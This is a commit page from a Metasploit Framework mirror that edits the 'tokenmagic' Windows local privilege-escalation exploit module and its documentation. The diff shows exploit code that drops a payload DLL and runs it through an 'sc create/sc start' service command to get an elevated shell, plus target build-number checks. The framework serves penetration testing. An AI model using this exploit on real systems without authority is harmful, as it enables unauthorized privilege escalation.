github/metasploit-framework
1
Fork 0
mirror of https://github.com/rapid7/metasploit-framework synced 2024-09-25 10:48:31 +02:00
Code Releases Activity

Land #15223, move TokenMagic validation logic

Browse Source
This commit is contained in:
Shelby Pace 2021-05-24 14:51:13 -05:00
commit 8e4a33f2a2
No known key found for this signature in database
GPG Key ID: B2F3A8B476406857
2 changed files with 10 additions and 9 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
documentation/modules/exploit/windows/local/tokenmagic.md
View File

@ -11,9 +11,11 @@ The module exploits the high IL gained from the "token magic" by either starting
on a known DLL in `system32`.
### Installation And Setup
Windows 10 versions 1803 is vulnerable out of the box. Token Magic works on Windows 7, 8, 8,1 and Windows 10 instances up to 1803. The DLL
Windows 10 versions 1803 is vulnerable out of the box. Token Magic works on Windows 7sp1, 8, 8,1 and Windows 10 instances up to 1803. The DLL
hijacking method in this module relies on a DLL that is only usable in Windows 1703 - 1803 and will not work on other
versions. Also note the DLL method uses a trigger that can take up to ten minutes to return a shell.
versions. Also note the DLL method uses a trigger that can take up to ten minutes to return a shell. The technique
may work on Windows 7 sp0, but loading powershell appears to crash the session. You might be able to upload and run
the powershell script manually after some edits to accomplish access to a Windows 7 sp0 target.
## Verification Steps
1. Start msfconsole

13
modules/exploits/windows/local/tokenmagic.rb
View File

@ -139,6 +139,10 @@ minutes to trigger', 'SERVICE', ['SERVICE', 'DLL']
writable_dir = session.sys.config.getenv('TEMP')
end
# Check target
validate_active_host
validate_payload
if datastore['METHOD'] =~ /DLL/i
bin_path = "#{writable_dir}\\WindowsCoreDeviceInfo.dll"
payload = generate_payload_dll
@ -156,11 +160,6 @@ minutes to trigger', 'SERVICE', ['SERVICE', 'DLL']
cmd_args = "/c sc create #{service_name} binPath= #{bin_path} type= own start= demand && sc start #{service_name}"
end
# Check target
print_status('Checking Target')
validate_active_host
validate_payload
# Upload the payload
print_status("Uploading payload to #{bin_path}")
write_file(bin_path, payload)
@ -217,11 +216,11 @@ minutes to trigger and recieve a shell.")
vprint_status("Build Number = #{build_num}")
if datastore['METHOD'] =~ /service/i
# Service method has been tested on Windows 7, 8 and 10 (1803 and ealier)
return Exploit::CheckCode::Appears if (build_num >= 7600 && build_num <= 17134)
return Exploit::CheckCode::Appears if (build_num >= 7601 && build_num <= 17134)
elsif (sysinfo_value =~ /10/ && build_num >= 15063 && build_num <= 17134)
# DLL method has been tested on Windows 10 (1703 to 1803)
return Exploit::CheckCode::Appears
elsif (datastore['METHOD'] =~ /dll/i && build_num >= 7600 && build_num < 15063)
elsif (datastore['METHOD'] =~ /dll/i && build_num >= 7601 && build_num < 15063)
print_error("The current target is not vulnerable to the DLL hijacking technique. Please try setting METHOD to 'SERVICE' and then try again!")
end
Exploit::CheckCode::Safe